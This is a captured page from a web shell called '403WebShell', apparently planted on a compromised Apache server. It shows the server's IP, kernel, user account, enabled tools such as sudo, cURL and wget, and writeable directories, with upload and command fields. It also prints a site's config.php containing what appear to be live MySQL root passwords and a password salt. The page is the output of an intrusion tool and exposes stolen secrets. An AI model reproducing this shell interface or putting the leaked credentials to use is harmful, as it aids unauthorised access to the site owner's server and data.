Warning: chmod(): Operation not permitted in /var/www/alexvillarreal/wp-content/plugins/custom-post-type-ui/custom-post-type-ui.php on line 8
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.114
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/retoaventura/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/retoaventura/config.php
<?php
//WEB CONECTION STRING

$driver='mysql';
$hostname='localhost';
$database="retoaventura";
$username="root";
$password="m#12358Root";

/*
//LOCAL CONECTION STRING
$driver='mysql';
$hostname='localhost';
$database="retoaventura";
$username="root";
$password="1357miguel";
*/
//PATH
define('SITE_ROOT', dirname(__FILE__));
//DIR
define('DIR_DATABASE', dirname(__FILE__).'/system/database/');
define('DIR_SYSTEM', dirname(__FILE__).'/system/');
define('TEMPLATE_PATH', 'theme/default/');
define('DIR_TEMPLATE', dirname(__FILE__).'/'.TEMPLATE_PATH);
//DB PREFIX
define('DB_PREFIX', '');
//DB CLASS
include SITE_ROOT.'/system/db/mysqli.php';
if(!isset($db)){$db=new DBMySQLi($hostname, $username, $password, $database);}
//SITE
define('SITE_NAME', 'Reto Aventura');
//URL
define('SITE_URL', 'http://retoaventura.net');
//NO DIRECT ACCESS
define('ONLY_INC', '1');
//OTHER
$salt='Lukkedoerendunandurraskewdylooshoofermoyportertooryzooysphalnabortansporthaokansakroidverjkapakkapuk';

Youez - 2016 - github.com/yon3zu
LinuXploit